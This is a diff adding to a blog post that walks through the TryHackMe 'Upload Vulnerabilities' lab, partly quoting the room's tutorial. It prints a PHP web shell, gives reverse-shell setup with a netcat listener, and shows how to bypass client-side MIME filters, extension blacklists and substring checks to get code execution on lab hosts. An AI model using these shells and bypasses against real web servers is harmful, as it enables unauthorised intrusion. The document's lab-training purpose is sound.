--- a/_posts/TryHackMe/Upload_Vulnerabilies/2025-06-26-UV.md
+++ b/_posts/TryHackMe/Upload_Vulnerabilies/2025-06-26-UV.md
@@ -79,3 +79,344 @@ There are two basic ways to achieve RCE on a webserver when exploiting a file up
 
 ### Web shells:
 
+Let's assume that we've found a webpage with an upload form:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/8.png){: width="700" height="400" }
+
+Where do we go from here? Well, let's start with a gobuster scan:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/9.png){: width="700" height="400" }
+
+Looks like we've got two directories here -- uploads and assets. Of these, it seems likely that any files we upload will be placed in the "uploads" directory. We'll try uploading a legitimate image file first. Here I am choosing our cute dog photo from the previous task:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/10.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/11.png){: width="700" height="400" }
+
+Now, if we go to http://demo.uploadvulns.thm/uploads we should see that the spaniel picture has been uploaded!
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/12.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/13.png){: width="700" height="400" }
+
+Ok, we can upload images. Let's try a webshell now.
+
+As it is, we know that this webserver is running with a PHP back-end, so we'll skip straight to creating and uploading the shell. In real life, we may need to do a little more enumeration; however, PHP is a good place to start regardless.
+
+A simple webshell works by taking a parameter and executing it as a system command. In PHP, the syntax for this would be:
+
+```php
+<?php
+    echo system($_GET["cmd"]);
+?>   
+```
+
+This code takes a GET parameter and executes it as a system command. It then echoes the output out to the screen.
+
+Let's try uploading it to the site, then using it to show our current user and the contents of the current directory:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/14.png){: width="700" height="400" }
+
+Success!
+
+We could now use this shell to read files from the system, or upgrade from here to a reverse shell. Now that we have RCE, the options are limitless. Note that when using webshells, it's usually easier to view the output by looking at the source code of the page. This drastically improves the formatting of the output.
+
+### Reverse Shells:
+
+The process for uploading a reverse shell is almost identical to that of uploading a webshell, so this section will be shorter. We'll be using the ubiquitous Pentest Monkey reverse shell, which comes by default on Kali Linux, but can also be downloaded [here].(https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) You will need to edit line 49 of the shell. It will currently say `$ip = '127.0.0.1';  // CHANGE THIS`
+ -- as it instructs, change `127.0.0.1` to your TryHackMe tun0 IP address, which can be found on the access page. You can ignore the following line, which also asks to be changed. With the shell edited, the next thing we need to do is start a Netcat listener to receive the connection. `nc -lvnp 1234`:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/15.png){: width="700" height="400" }
+
+Now, let's upload the shell, then activate it by navigating to `http://demo.uploadvulns.thm/uploads/shell.php`. The name of the shell will obviously be whatever you called it (`php-reverse-shell.php` by default).
+
+The website should hang and not load properly -- however, if we switch back to our terminal, we have a hit!
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/16.png){: width="700" height="400" }
+
+Once again, we have obtained RCE on this webserver. From here we would want to stabilise our shell and escalate our privileges, but those are tasks for another time. For now, it's time you tried this for yourself!
+
+Navigate to `shell.uploadvulns.thm` and complete the questions for this task.
+
+### Challenge
+
+#### Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?
+
+**(N.B. This is a good habit to get into, and will serve you well in the upcoming tasks...)**
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/17.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/18.png){: width="700" height="400" }
+
+### Get either a web shell or a reverse shell on the machine. What's the flag in the /var/www/ directory of the server?
+
+1. Set up a listner:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/19.png){: width="700" height="400" }
+
+2. Went to the website:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/20.png){: width="700" height="400" }
+
+3. Created a reverse shell 
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/21.png){: width="700" height="400" }
+
+4. Created a PHP file to Paste the reverse shell payload
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/22.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/23.png){: width="700" height="400" }
+
+Went back to the website to to upload the php file
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/24.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/25.png){: width="700" height="400" }
+
+Reverse shell has been executed access to the web server is granted
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/26.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/27.png){: width="700" height="400" }
+
+---
+
+## Filtering 
+
+Up until now we have largely been ignoring the counter-defences employed by web developers to defend against file upload vulnerabilities. Every website that you've successfully attacked so far in this room has been completely insecure. It's time that changed. From here on out, we'll be looking at some of the defence mechanisms used to prevent malicious file uploads, and how to circumvent them.
+
+First up, let's discuss the differences between client-side filtering and server-side filtering.
+
+When we talk about a script being "Client-Side", in the context of web applications, we mean that it's running in the user's browser as opposed to on the web server itself. JavaScript is pretty much ubiquitous as the client-side scripting language, although alternatives do exist.  Regardless of the language being used, a client-side script will be run in your web browser. In the context of file-uploads, this means that the filtering occurs before the file is even uploaded to the server. Theoretically, this would seem like a good thing, right? In an ideal world, it would be; however, because the filtering is happening on our computer, it is trivially easy to bypass. As such client-side filtering by itself is a highly insecure method of verifying that an uploaded file is not malicious.
+
+Conversely, as you may have guessed, a server-side script will be run on the server. Traditionally PHP was the predominant server-side language (with Microsoft's ASP for IIS coming in close second); however, in recent years, other options (C#, Node.js, Python, Ruby on Rails, and a variety of others) have become more widely used. Server-side filtering tends to be more difficult to bypass, as you don't have the code in front of you. As the code is executed on the server, in most cases it will also be impossible to bypass the filter completely; instead we have to form a payload which conforms to the filters in place, but still allows us to execute our code.
+
+With that in mind, let's take a look at some different kinds of filtering.
+
+### File Type Filtering:
+
+Similar to Extension validation, but more intensive, file type filtering looks, once again, to verify that the contents of a file are acceptable to upload. We'll be looking at two types of file type validation:
+
+MIME validation: MIME (Multipurpose Internet Mail Extension) types are used as an identifier for files -- originally when transfered as attachments over email, but now also when files are being transferred over HTTP(S). The MIME type for a file upload is attached in the header of the request, and looks something like this:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/28.png){: width="700" height="400" }
+
+MIME types follow the format `<type>/<subtype>`. In the request above, you can see that the image "spaniel.jpg" was uploaded to the server. As a legitimate JPEG image, the MIME type for this upload was "image/jpeg". The MIME type for a file can be checked client-side and/or server-side; however, as MIME is based on the extension of the file, this is extremely easy to bypass.
+
+Magic Number validation: Magic numbers are the more accurate way of determining the contents of a file; although, they are by no means impossible to fake. The "magic number" of a file is a string of bytes at the very beginning of the file content which identify the content. For example, a PNG file would have these bytes at the very top of the file: `89 50 4E 47 0D 0A 1A 0A`.
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/29.png){: width="700" height="400" }
+
+### File Length Filtering:
+
+File length filters are used to prevent huge files from being uploaded to the server via an upload form (as this can potentially starve the server of resources). In most cases this will not cause us any issues when we upload shells; however, it's worth bearing in mind that if an upload form only expects a very small file to be uploaded, there may be a length filter in place to ensure that the file length requirement is adhered to. As an example, our fully fledged PHP reverse shell from the previous task is 5.4Kb big -- relatively tiny, but if the form expects a maximum of 2Kb then we would need to find an alternative shell to upload.
+
+### File Name Filtering:
+
+As touched upon previously, files uploaded to a server should be unique. Usually this would mean adding a random aspect to the file name, however, an alternative strategy would be to check if a file with the same name already exists on the server, and give the user an error if so. Additionally, file names should be sanitised on upload to ensure that they don't contain any "bad characters", which could potentially cause problems on the file system when uploaded (e.g. null bytes or forward slashes on Linux, as well as control characters such as `;` and potentially unicode characters). What this means for us is that, on a well administered system, our uploaded files are unlikely to have the same name we gave them before uploading, so be aware that you may have to go hunting for your shell in the event that you manage to bypass the content filtering.
+
+### File Content Filtering:
+
+More complicated filtering systems may scan the full contents of an uploaded file to ensure that it's not spoofing its extension, MIME type and Magic Number. This is a significantly more complex process than the majority of basic filtration systems employ, and thus will not be covered in this room.
+It's worth noting that none of these filters are perfect by themselves -- they will usually be used in conjunction with each other, providing a multi-layered filter, thus increasing the security of the upload significantly. Any of these filters can all be applied client-side, server-side, or both.
+
+Similarly, different frameworks and languages come with their own inherent methods of filtering and validating uploaded files. As a result, it is possible for language specific exploits to appear; for example, until PHP major version five, it was possible to bypass an extension filter by appending a null byte, followed by a valid extension, to the malicious .php file. More recently it was also possible to inject PHP code into the exif data of an otherwise valid image file, then force the server to execute it. These are things that you are welcome to research further, should you be interested.
+
+---
+
+## Bypassing Client-Side Filtering
+
+We'll begin with the first (and weakest) line of defence: Client-Side Filtering.
+
+As mentioned previously, client-side filtering tends to be extremely easy to bypass, as it occurs entirely on a machine that you control. When you have access to the code, it's very easy to alter it.
+
+There are four easy ways to bypass your average client-side file upload filter:
+
+1. Turn off Javascript in your browser -- this will work provided the site doesn't require Javascript in order to provide basic functionality. If turning off Javascript completely will prevent the site from working at all then one of the other methods would be more desirable; otherwise, this can be an effective way of completely bypassing the client-side filter.
+
+2. Intercept and modify the incoming page. Using Burpsuite, we can intercept the incoming web page and strip out the Javascript filter before it has a chance to run. The process for this will be covered below.
+
+3. Intercept and modify the file upload. Where the previous method works before the webpage is loaded, this method allows the web page to load as normal, but intercepts the file upload after it's already passed (and been accepted by the filter). Again, we will cover the process for using this method in the course of the task.
+
+
+4. Send the file directly to the upload point. Why use the webpage with the filter, when you can send the file directly using a tool like `curl`? Posting the data directly to the page which contains the code for handling the file upload is another effective method for completely bypassing a client side filter. We will not be covering this method in any real depth in this tutorial, however, the syntax for such a command would look something like this: `curl -X POST -F "submit:<value>" -F "<file-parameter>:@<path-to-file>" <site>`. To use this method you would first aim to intercept a successful upload (using Burpsuite or the browser console) to see the parameters being used in the upload, which can then be slotted into the above command.
+We will be covering methods two and three in depth below.
+
+We will be covering methods two and three in depth below.
+
+Let's assume that, once again, we have found an upload page on a website:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/30.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/31.png){: width="700" height="400" }
+
+n this instance we can see that the filter is using a whitelist to exclude any MIME type that isn't image/jpeg.
+
+Our next step is to attempt a file upload -- as expected, if we choose a JPEG, the function accepts it. Anything else and the upload is rejected.
+
+Having established this, let's start Burpsuite and reload the page. We will see our own request to the site, but what we really want to see is the server's response, so right click on the intercepted data, scroll down to "Do Intercept", then select "Response to this request":
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/32.png){: width="700" height="400" }
+
+When we click the "Forward" button at the top of the window, we will then see the server's response to our request. Here we can delete, comment out, or otherwise break the Javascript function before it has a chance to load:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/33.png){: width="700" height="400" }
+
+Having deleted the function, we once again click "Forward" until the site has finished loading, and are now free to upload any kind of file to the website:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/34.png){: width="700" height="400" }
+
+It's worth noting here that Burpsuite will not, by default, intercept any external Javascript files that the web page is loading. If you need to edit a script which is not inside the main page being loaded, you'll need to go to the "Options" tab at the top of the Burpsuite window, then under the "Intercept Client Requests" section, edit the condition of the first line to remove `^js$|`:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/35.png){: width="700" height="400" }
+
+We've already bypassed this filter by intercepting and removing it prior to the page being loaded, but let's try doing it by uploading a file with a legitimate extension and MIME type, then intercepting and correcting the upload with Burpsuite.
+
+Having reloaded the webpage to put the filter back in place, let's take the reverse shell that we used before and rename it to be called "shell.jpg". As the MIME type (based on the file extension) automatically checks out, the Client-Side filter lets our payload through without complaining:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/36.png){: width="700" height="400" }
+
+Once again we'll activate our Burpsuite intercept, then click "Upload" and catch the request:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/37.png){: width="700" height="400" }
+
+Observe that the MIME type of our PHP shell is currently image/jpeg. We'll change this to text/x-php, and the file extension from .jpg to .php, then forward the request to the server:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/38.png){: width="700" height="400" }
+
+Now, when we navigate to http://demo.uploadvulns.thm/uploads/shell.php having set up a netcat listener, we receive a connection from the shell!
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/39.png){: width="700" height="400" }
+
+We've covered in detail two ways to bypass a Client-Side file upload filter. Now it's time for you to give it a shot for yourself! Navigate to `java.uploadvulns.thm` and bypass the filter to get a reverse shell. Remember that not all client-side scripts are inline! As mentioned previously, Gobuster would be a very good place to start here -- the upload directory name will be changing with every new challenge.
+
+### Challenge 
+
+**What is the flag in /var/www/?**
+
+First I set up my nc listener on my machine:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/46.png){: width="700" height="400" }
+
+Next I went to the webiste:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/40.png){: width="700" height="400" }
+
+Then I looked at the souce code on the page:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/41.png){: width="700" height="400" }
+
+Afterwards I opened Burpsuite:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/42.png){: width="700" height="400" }
+
+Next I ran Gobuster to get a view of the directories which 2 were shown assets and images:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/47.png){: width="700" height="400" }
+
+Afterwards after refreshing the page testing the upload and heading to **Target** and **Site map** in **Burp Suite** I was able to view the response and view the content filter it was using for uploads:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/44.png){: width="700" height="400" }
+
+I then change my payload.php to payload.png:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/43.png){: width="700" height="400" }
+
+I then upload it and intercept the request with BurpSuite and change the extension to .php and content type to text/x-php:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/45.png){: width="700" height="400" }
+
+I then search `java.uploadvulns.thm/images/payload.php` to initiate the connection to my listener. Below is the images directory with the php file I uploaded.
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/48.png){: width="700" height="400" }
+
+The reverse shell connecition is active to my machine:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/49.png){: width="700" height="400" }
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/50.png){: width="700" height="400" }
+
+---
+
+Time to turn things up another notch!
+Client-side filters are easy to bypass -- you can see the code for them, even if it's been obfuscated and needs processed before you can read it; but what happens when you can't see or manipulate the code? Well, that's a server-side filter. In short, we have to perform a lot of testing to build up an idea of what is or is not allowed through the filter, then gradually put together a payload which conforms to the restrictions.
+
+For the first part of this task we'll take a look at a website that's using a blacklist for file extensions as a server side filter. There are a variety of different ways that this could be coded, and the bypass we use is dependent on that. In the real world we wouldn't be able to see the code for this, but for this example, it will be included here:
+
+```php
+<?php
+    //Get the extension
+    $extension = pathinfo($_FILES["fileToUpload"]["name"])["extension"];
+    //Check the extension against the blacklist -- .php and .phtml
+    switch($extension){
+        case "php":
+        case "phtml":
+        case NULL:
+            $uploadFail = True;
+            break;
+        default:
+            $uploadFail = False;
+    }
+?>
+```
+
+In this instance, the code is looking for the last period (`.`) in the file name and uses that to confirm the extension, so that is what we'll be trying to bypass here. Other ways the code could be working include: searching for the first period in the file name, or splitting the file name at each period and checking to see if any blacklisted extensions show up. We'll cover this latter case later on, but in the meantime, let's focus on the code we've got here.
+
+We can see that the code is filtering out the `.php` and `.phtml` extensions, so if we want to upload a PHP script we're going to have to find another extension. The wikipedia page for PHP gives us a few common extensions that we can try; however, there are actually a variety of other more rarely used extensions available that webservers may nonetheless still recognise. These include: `.php3`, `.php4`, `.php5`, `.php7`, `.phps`, `.php-s`, `.pht` and `.phar`. Many of these bypass the filter (which only blocks.php and .phtml), but it appears that the server is configured not to recognise them as PHP files, as in the below example:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/51.png){: width="700" height="400" }
+
+This is actually the default for Apache2 servers, at the time of writing; however, the sysadmin may have changed the default configuration (or the server may be out of date), so it's well worth trying.
+
+Eventually we find that the `.phar` extension bypasses the filter -- and works -- thus giving us our shell:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/52.png){: width="700" height="400" }
+
+Let's have a look at another example, with a different filter. This time we'll do it completely black-box: i.e. without the source code.
+
+Once again, we have our upload form:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/53.png){: width="700" height="400" }
+
+Ok, we'll start by scoping this out with a completely legitimate upload. Let's try uploading the `spaniel.jpg` image from before:
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/54.png){: width="700" height="400" }
+
+Well, that tells us that JPEGS are accepted at least. Let's go for one that we can be pretty sure will be rejected (`shell.php`):
+
+![Desktop View](/assets/img/Upload_Vulnerabilities/55.png){: width="700" height="400" }
+
+Can't say that was unexpected.
+
+From here we enumerate further, trying the techniques from above and just generally trying to get an idea of what the filter will accept or reject.
+
+In this case we find that there are no shell extensions that both execute, and are not filtered, so it's back to the drawing board.
+
+In the previous example we saw that the code was using the `pathinfo()` PHP function to get the last few characters after the `.`, but what happens if it filters the input slightly differently?
+
+Let's try uploading a file called `shell.jpg.php`. We already know that JPEG files are accepted, so what if the filter is just checking to see if the `.jpg` file extension is somewhere within the input?
+
+Pseudocode for this kind of filter may look something like this:
+
+```text
+ACCEPT FILE FROM THE USER -- SAVE FILENAME IN VARIABLE userInput
+IF STRING ".jpg" IS IN VARIABLE userInput:
+    SAVE THE FILE
+ELSE:
+    RETURN ERROR MESSAGE
+```
+
+When we try to upload our file we get a success message. Navigating to the `/uploads` directory confirms that the payload was successfully uploaded
+
+Activating it, we receive our shell
+
+---
+
+This is by no means an exhaustive list of upload vulnerabilities related to file extensions. As with everything in hacking, we are looking to exploit flaws in code that others have written; this code may very well be uniquely written for the task at hand. This is the really important point to take away from this task: there are a million different ways to implement the same feature when it comes to programming -- your exploitation must be tailored to the filter at hand. The key to bypassing any kind of server side filter is to enumerate and see what is allowed, as well as what is blocked; then try to craft a payload which can pass the criteria the filter is looking for.
+Now your turn. You know the drill by now -- figure out and bypass the filter to upload and activate a shell. Your flag is in /var/www/. The site you're accessing is annex.uploadvulns.thm.
+
+Be aware that this task has also implemented a randomised naming scheme for the first time. For now you shouldn't have any trouble finding your shell, but be aware that directories will not always be indexable...
+
+### Challenge 
+
